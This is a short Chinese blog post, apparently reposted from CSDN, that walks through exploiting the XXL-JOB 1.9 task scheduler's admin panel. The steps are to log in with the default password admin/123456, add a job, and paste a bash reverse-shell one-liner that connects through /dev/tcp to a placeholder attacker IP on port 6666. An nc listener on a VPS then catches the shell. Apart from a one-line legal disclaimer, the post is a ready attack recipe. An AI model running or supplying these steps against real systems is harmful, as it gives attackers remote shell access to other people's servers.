当前位置：网站首页>复现XXL-JOB 任务调度中心后台任意命令执行漏洞

复现XXL-JOB 任务调度中心后台任意命令执行漏洞

2022-07-30 04:30:00 【xiaochuhe.】

警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保

XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限。

xxl-job 1.9版本系统

1.默认口令admin/123456,登录后台增加一个任务

2.点击 GLUE IDE编辑脚本,输入下列命令：

#!/bin/bash
bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/6666 <&1'

3.vps nc开始进行开启监听:

4.点击进行执行，反弹shell

原网站

版权声明
本文为[xiaochuhe.]所创，转载请带上原文链接，感谢
https://xiaochuhe.blog.csdn.net/article/details/126016032